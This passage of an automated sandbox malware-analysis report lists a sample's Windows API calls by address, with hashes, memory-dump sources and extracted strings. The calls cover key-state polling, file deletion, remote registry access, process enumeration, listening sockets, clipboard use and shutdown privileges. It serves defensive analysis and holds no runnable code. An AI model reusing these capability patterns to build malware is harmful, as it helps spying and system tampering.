                                            • Instruction Fuzzy Hash: 9F727E71E04219DBDB64DF98C8807AEB7B5FF08714F14816AE905EB381EB709E81DB94
                                            APIs
                                              • Part of subcall function 00846EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00845FA6,?), ref: 00846ED8
                                              • Part of subcall function 008472CB: GetFileAttributesW.KERNEL32(?,00846019), ref: 008472CC
                                            • _wcscat.LIBCMT ref: 00846441
                                            • __wsplitpath.LIBCMT ref: 0084645F
                                            • FindFirstFileW.KERNEL32(?,?), ref: 00846474
                                            • _wcscpy.LIBCMT ref: 008464A3
                                            • _wcscat.LIBCMT ref: 008464B8
                                            • _wcscat.LIBCMT ref: 008464CA
                                            • DeleteFileW.KERNEL32(?), ref: 008464DA
                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 008464EB
                                            • FindClose.KERNEL32(00000000), ref: 00846506
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                            • String ID: \*.*$p1Wu`KXu
                                            • API String ID: 2643075503-2866000061
                                            • Opcode ID: ebc670ca73d155f306ea9f9d52faa0fdeea2cf5a256d213b81ac10d821941096
                                            • Instruction ID: c9b059c8c8a25274e415e96797c32e198bdfae2a27033bcff4802cf7638fffad
                                            • Opcode Fuzzy Hash: ebc670ca73d155f306ea9f9d52faa0fdeea2cf5a256d213b81ac10d821941096
                                            • Instruction Fuzzy Hash: 5F3164B24083889AC721EBA88889DDBB7DCFF56310F44092AF5D9C3142FB35D5498767
                                            APIs
                                              • Part of subcall function 00863C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00862BB5,?,?), ref: 00863C1D
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0086328E
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0086332D
                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008633C5
                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00863604
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00863611
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                            • String ID:
                                            • API String ID: 1240663315-0
                                            • Opcode ID: 8d4923574af0446bd879df27de564af03cf5cd9a6aa89b7bde26a3c159ddb5f6
                                            • Instruction ID: 0f55d45e6c22db91df73ec41e7911d0f394fb1379eeb8869d7bfaa4bf865822e
                                            • Opcode Fuzzy Hash: 8d4923574af0446bd879df27de564af03cf5cd9a6aa89b7bde26a3c159ddb5f6
                                            • Instruction Fuzzy Hash: 69E15B71604200AFCB15DF28C995E6ABBE9FF88314F05856DF58ADB2A1DB30E905CB52
                                            APIs
                                            • GetKeyboardState.USER32(?), ref: 00842B5F
                                            • GetAsyncKeyState.USER32(000000A0), ref: 00842BE0
                                            • GetKeyState.USER32(000000A0), ref: 00842BFB
                                            • GetAsyncKeyState.USER32(000000A1), ref: 00842C15
                                            • GetKeyState.USER32(000000A1), ref: 00842C2A
                                            • GetAsyncKeyState.USER32(00000011), ref: 00842C42
                                            • GetKeyState.USER32(00000011), ref: 00842C54
                                            • GetAsyncKeyState.USER32(00000012), ref: 00842C6C
                                            • GetKeyState.USER32(00000012), ref: 00842C7E
                                            • GetAsyncKeyState.USER32(0000005B), ref: 00842C96
                                            • GetKeyState.USER32(0000005B), ref: 00842CA8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: State$Async$Keyboard
                                            • String ID:
                                            • API String ID: 541375521-0
                                            • Opcode ID: 4af6f66d278b5d0c897cfaa41cf315812d018301272cd5e5dbeed17b21184232
                                            • Instruction ID: 1912189799112208634445bc4c2c8bbc11ffa4003e4242778300a52467388a69
                                            • Opcode Fuzzy Hash: 4af6f66d278b5d0c897cfaa41cf315812d018301272cd5e5dbeed17b21184232
                                            • Instruction Fuzzy Hash: 3D41963450C7CD6DFF359B6488443A9BFA0FB21354F84409AE5C6D66C2DB949AC4C7A2
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                            • String ID:
                                            • API String ID: 1737998785-0
                                            • Opcode ID: 18a5df6d78f35201c7859997a265d6b236b161d507d20529049ab3f7cf446531
                                            • Instruction ID: 741f470d0c072a5513f86be8e0af7ebae7b7b5b87b8835b899b22a683f872a4f
                                            • Opcode Fuzzy Hash: 18a5df6d78f35201c7859997a265d6b236b161d507d20529049ab3f7cf446531
                                            • Instruction Fuzzy Hash: BD219F313002149FDB01AF68DD49F6D77A9FF14711F008419F94ADB2A2EB75EC118B95
                                            APIs
                                              • Part of subcall function 00839ABF: CLSIDFromProgID.OLE32 ref: 00839ADC
                                              • Part of subcall function 00839ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00839AF7
                                              • Part of subcall function 00839ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00839B05
                                              • Part of subcall function 00839ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00839B15
                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0085C235
                                            • _memset.LIBCMT ref: 0085C242
                                            • _memset.LIBCMT ref: 0085C360
                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0085C38C
                                            • CoTaskMemFree.OLE32(?), ref: 0085C397
                                            Strings
                                            • NULL Pointer assignment, xrefs: 0085C3E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                            • String ID: NULL Pointer assignment
                                            • API String ID: 1300414916-2785691316
                                            • Opcode ID: 272f655f066966e1588be9b176f2d745e5e347c5255297925d78fe12ba132e79
                                            • Instruction ID: 456069f0efab08c7e5f4f73168e5e1332032cdc1f4e049935c56a8f8c4280d24
                                            • Opcode Fuzzy Hash: 272f655f066966e1588be9b176f2d745e5e347c5255297925d78fe12ba132e79
                                            • Instruction Fuzzy Hash: 8A91F671D00218ABDB10DF94DC91EDEBBB9FF04750F10816AE915E7291EB709A45CFA1
                                            APIs
                                              • Part of subcall function 0083B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0083B180
                                              • Part of subcall function 0083B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0083B1AD
                                              • Part of subcall function 0083B134: GetLastError.KERNEL32 ref: 0083B1BA
                                            • ExitWindowsEx.USER32(?,00000000), ref: 00847A0F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                            • String ID: $@$SeShutdownPrivilege
                                            • API String ID: 2234035333-194228
                                            • Opcode ID: 5a174e850f8a3536e3595943b89c80da2cfcf4235ec301b881fcde20ed790c5d
                                            • Instruction ID: ecaa839d5eeabf9f88217b03ccc63e367939daa49ef025a85a449e4ce60ffc81
                                            • Opcode Fuzzy Hash: 5a174e850f8a3536e3595943b89c80da2cfcf4235ec301b881fcde20ed790c5d
                                            • Instruction Fuzzy Hash: 0101A77165833D6AF728A668DC5ABBF775CFB00744F140425F953E21D2D7649E0082A1
                                            APIs
                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00858CA8
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00858CB7
                                            • bind.WSOCK32(00000000,?,00000010), ref: 00858CD3
                                            • listen.WSOCK32(00000000,00000005), ref: 00858CE2
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00858CFC
                                            • closesocket.WSOCK32(00000000,00000000), ref: 00858D10
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                            • String ID:
                                            • API String ID: 1279440585-0
                                            • Opcode ID: f170eb800d215283ac9cfde134ad44fa33c9d268cd8a217d598664094a018edf
                                            • Instruction ID: f567184f1069c7768e1f1c879af1de174bfcc3443b1aee8435e3030e5b5d62bb
                                            • Opcode Fuzzy Hash: f170eb800d215283ac9cfde134ad44fa33c9d268cd8a217d598664094a018edf
                                            • Instruction Fuzzy Hash: 67219A31600204EFCB10AF68CD85A6EB7A9FF48725F108159E956F73E2CB70AD458B62
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00846554
                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00846564
                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00846583
                                            • __wsplitpath.LIBCMT ref: 008465A7
                                            • _wcscat.LIBCMT ref: 008465BA
                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 008465F9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                            • String ID:
                                            • API String ID: 1605983538-0
                                            • Opcode ID: edebdcea9a98755feb19bf210ebadb722bde3aec5966967de61ddb52d246cbc2
                                            • Instruction ID: 94f8c98c9f5a50c485b5975d875c34aa933e4ddc4e6dca2b35e465198c9e9dc9
                                            • Opcode Fuzzy Hash: edebdcea9a98755feb19bf210ebadb722bde3aec5966967de61ddb52d246cbc2
                                            • Instruction Fuzzy Hash: C421627190021CABDB10ABA4DD89FEEB7BCFB49300F5004A5E505E7181EB759F85CB61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$aqg5cvv9aqg55vv9aqg52vv9aqg5fvv9aqg5fvv9aqg55vv9aqg55vv9aqg51vv9aqg5cvv9aqg58vv9aqg55vv9aqg5cvv9aqg50vv9aqg57vv9aqg5
                                            • API String ID: 0-2111023343
                                            • Opcode ID: 08a59ac289b607031b4c103841ecc4bec832c2cd9cce22d9fd2f3c3367d488d7
                                            • Instruction ID: 2c4a91300c36a2564b3ef8a133ab6a04c6c7c45aee7257ae856a8bc0df5ee523
                                            • Opcode Fuzzy Hash: 08a59ac289b607031b4c103841ecc4bec832c2cd9cce22d9fd2f3c3367d488d7
                                            • Instruction Fuzzy Hash: 69926C71E0021ACBDF68DF58C8807ADB7B1FF94314F2481AAE856EB285D7719D81CB91
                                            APIs
                                              • Part of subcall function 0085A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0085A84E
                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00859296
                                            • WSAGetLastError.WSOCK32(00000000,00000000), ref: 008592B9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorLastinet_addrsocket
                                            • String ID:
                                            • API String ID: 4170576061-0
                                            • Opcode ID: b6d771410bbc01493ecf87bd2ff3113ec7a11e7977c6ebd53239ef05c3401513
                                            • Instruction ID: 0815f6902cf5075f2967ac4796bfe524d71bf0b4fc2d5d08f3c8329c1278578b
                                            • Opcode Fuzzy Hash: b6d771410bbc01493ecf87bd2ff3113ec7a11e7977c6ebd53239ef05c3401513
                                            • Instruction Fuzzy Hash: BB41BF70600204AFDB10AB688C46EBE77EDFF44724F048548F996EB3D2DB749D418B92
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?), ref: 0084EB8A
                                            • _wcscmp.LIBCMT ref: 0084EBBA
                                            • _wcscmp.LIBCMT ref: 0084EBCF
                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0084EBE0
                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0084EC0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Find$File_wcscmp$CloseFirstNext
                                            • String ID:
                                            • API String ID: 2387731787-0
                                            • Opcode ID: 42bb964f9e50b77de76872e9982e7d205b17d0f82d9418b3afc1c66262647962
                                            • Instruction ID: 3485818e8551073b8239849ce69bc4b8ed9bb056901249280f94f974869b2555
                                            • Opcode Fuzzy Hash: 42bb964f9e50b77de76872e9982e7d205b17d0f82d9418b3afc1c66262647962
                                            • Instruction Fuzzy Hash: F9418C356007069FCB08DF28C491E9AB7E8FF59324F10455DEA5ACB3A1DB31A984CF92
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                            • String ID:
                                            • API String ID: 292994002-0
                                            • Opcode ID: 92d2404b2ffa7fc5e73580df1614001824a4f64e03052907ed01e5f696b4b340
                                            • Instruction ID: 413c860b287d6cca362f96552089bbc8e22836108b23f83ba4a786bda07e3d75
                                            • Opcode Fuzzy Hash: 92d2404b2ffa7fc5e73580df1614001824a4f64e03052907ed01e5f696b4b340
                                            • Instruction Fuzzy Hash: BE11EF31300225AFE7216F2ADC44E6FBB9DFF56320B020529F80DD7281CF70E84286A5
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,0081E014,75570AE0,0081DEF1,0089DC38,?,?), ref: 0081E02C
                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0081E03E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                            • API String ID: 2574300362-192647395
                                            • Opcode ID: ef196e8e479217695199cd4f4a118be23eda8d193631f2b875b8c5677a860be1
                                            • Instruction ID: dde16303b166669e5353216c0c7e77fabe48a26fb934c1b013413a288381e69d
                                            • Opcode Fuzzy Hash: ef196e8e479217695199cd4f4a118be23eda8d193631f2b875b8c5677a860be1
                                            • Instruction Fuzzy Hash: 61D0C774500B129FD7315F65EC0D696B7D8FF04711F188419E895D2790D7B8D8C08750
                                            APIs
                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 008413DC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: lstrlen
                                            • String ID: ($|
                                            • API String ID: 1659193697-1631851259
                                            • Opcode ID: 669e3937a1d55408cb4856d57be7add7da6818b110927c39f41ca22cf6913a93
                                            • Instruction ID: 0954a0d4d6914f5dca6f976ddab2e4ea3677ddd2bf915e66262d59e33f39c2a4
                                            • Opcode Fuzzy Hash: 669e3937a1d55408cb4856d57be7add7da6818b110927c39f41ca22cf6913a93
                                            • Instruction Fuzzy Hash: AB322875A007099FCB28CF69C4849AAB7F1FF48310B15C56EE59ADB3A1E770E981CB44
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 0081B22F
                                              • Part of subcall function 0081B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0081B5A5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Proc$LongWindow
                                            • String ID:
                                            • API String ID: 2749884682-0
                                            • Opcode ID: afac727bf4bb37ac74945fc1bff749649ccc097f569293efa6cacafd76d97717
                                            • Instruction ID: 42fa861c39523caf8066e948c40bdf8e8e3aa1a0c152678b1aa89996a22e46d9
                                            • Opcode Fuzzy Hash: afac727bf4bb37ac74945fc1bff749649ccc097f569293efa6cacafd76d97717
                                            • Instruction Fuzzy Hash: 6BA1577011410DBADB28AB2D9C88EFF296CFF5B368B108119F50AD6296DB34DC85D273
                                            APIs
                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008543BF,00000000), ref: 00854FA6
                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00854FD2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Internet$AvailableDataFileQueryRead
                                            • String ID:
                                            • API String ID: 599397726-0
                                            • Opcode ID: 87281b41892cbbd81089c93998dc075b35d308a2a98be9150c303a02b876c590
                                            • Instruction ID: 3e290a323e12b3819f1bf13ff5944404e94acbe8df9337693cd26bd0f4974500
                                            • Opcode Fuzzy Hash: 87281b41892cbbd81089c93998dc075b35d308a2a98be9150c303a02b876c590
                                            • Instruction Fuzzy Hash: 7D41E971504609BFEB209E88DC85EBF77BCFB4076EF10402AFA05E6181DA719E899660
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 0084E20D
                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0084E267
                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0084E2B4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorMode$DiskFreeSpace
                                            • String ID:
                                            • API String ID: 1682464887-0
                                            • Opcode ID: 3bf784caed0862510c30d8c4b4414cfdd713aa5064d3739feb14cff326e932a3
                                            • Instruction ID: bbea217bb2536a05b38c13fa822299956c1885040b187c38f97836862fb28798
                                            • Opcode Fuzzy Hash: 3bf784caed0862510c30d8c4b4414cfdd713aa5064d3739feb14cff326e932a3
                                            • Instruction Fuzzy Hash: BB215C35A00218EFCB00EFA9D885AADFBB8FF48314F0484A9E945E7291DB319915CB51
                                            APIs
